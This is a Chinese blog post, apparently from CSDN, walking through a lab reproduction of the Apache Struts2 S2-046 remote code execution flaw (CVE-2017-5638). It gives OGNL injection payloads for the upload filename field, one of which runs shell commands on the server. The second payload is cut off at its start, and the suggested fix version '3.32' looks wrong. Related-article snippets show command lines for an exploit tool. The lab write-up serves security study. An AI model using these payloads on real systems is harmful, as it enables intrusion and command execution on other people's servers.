Struts2 S2-046漏洞复现 (CVE-2017-5638)

最新推荐文章于 2024-04-30 17:28:01 发布
最新推荐文章于 2024-04-30 17:28:01 发布
阅读量3.3k 收藏 4
点赞数
文章标签: struts java web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzezhi/article/details/125012110
版权

一:漏洞介绍

名称: struts2-046 远程代码执行 (CVE-2017-5638)

描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。

二:漏洞编号

CVE-2017-5638

三:受影响版本

Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10

四:环境搭建

使用vulfocus

五:漏洞复现

1.访问靶场,是一个文件上传也面,点击提交burp抓包

2.修改filename参数

poc:

%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',1+99)}\xb

在xb中间加个空格选中后改为00,再发包 执行了poc里的1+99下图

 

3.获取falg

poc:

hony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b

 六.修复建议

建议升级至Struts版本3.32或2.5.10.1

@A1
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
S2-046 远程代码执行漏洞CVE-2017-5638)
Stephen Wolf
11-05 3867
一、S2-046 远程代码执行漏洞CVE-2017-5638) 漏洞简介 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响版本: Strut...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
struts2反序列化漏洞挖掘(s2-046)
siu~
09-26 292
本文只聚焦于实战情况下如何从黑盒角度发漏洞到利用漏洞的过程。
S2-045 远程代码执行漏洞CVE-2017-5638)
Stephen Wolf
11-04 8053
一、S2-045 远程代码执行漏洞CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
Struts2 S2-046漏洞
2301_76467680的博客
07-09 621
在xb中间加个空格选中后改为00,再发包。修改filename参数。成功实远程命令执行。
九、【漏洞Struts 2 远程代码执行漏洞s2-046(CVE-2017-5638)
weixin_52351575的博客
09-22 477
Struts 2是一个基于MVC设计模式的Web应用框架,本质上相当于一个Servlet,在MVC设计模式中,Struts2作为控制器来建立模型与视图进行数据交互。攻击者通过发送恶意构造的HTTP数据包利用该漏洞(通过构造HTTP请求头中的Content-type)在服务器上执行系统命令,进一步完全控制该服务器,造成拒绝服务,数据泄露,网站篡改等后果。该漏洞无需任何前置条件(如开启dmi,debug等功能),以及启用任何插件,危害较为严重。​可以直接检测站点是否存在本漏洞。使用知道创宇SeeBug​。
struts2-cve_2017_5638漏洞
weixin_59872639的博客
03-01 1724
漏洞概述 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实的Web应用程序框架。 Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行.
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)
qq_40640917的博客
02-23 2096
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
使用 ModSecurity 虚拟修补 Apache Struts CVE-2017-5638
allway2的博客
08-09 356
作为升级到新版 Struts 的一部分,每个依赖于 Struts 的应用程序都需要重新构建并使用最新的 Struts 库进行测试。通过这样做,您可以保护您的网站免受攻击。当快速部署修库中的代码不切实际时,您可以使用 ModSecurity 拦截漏洞,“虚拟修补”受影响的代码,直到您可以升级受影响的库。有了 ModSecurity 自定义规则,您就可以按照合理的时间表仔细地修补生产软件,而不会受到易受攻击的压力。当打印未转义的无效标头时,将评估 OGNL 表达式,并执行 OGNL 表达式中的任何系统命令。.
struts2/s2-046漏洞
weixin_44253823的博客
11-19 3006
漏洞环境采用vulhub下struts2/s2-046。 搭建好环境后访问youip:8080 点击Submit的同时打开burpsuite抓包工具。 发送到Repeater模块,在filename中插入下列POC代码。 %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('...
【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)
热门推荐
Jaychouzzk
11-05 2万+
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts版本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实验文件 实验目的: 了解S2-045 Struts2远程命令执行漏洞危害 掌握检测修S2-045 Struts2远程命令执行漏洞技术 实验文件: ...
春秋云镜 CVE-2017-5638
qq_22002773的博客
09-07 251
春秋云镜 CVE-2017-5638
Struts2漏洞合集
weixin_42345596的博客
07-11 2702
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务
链表刷题集
最新发布
yajunjiao的专栏
04-30 904
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
cve-2017-7504漏洞
08-23
您好!对于CVE-2017-7504漏洞,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值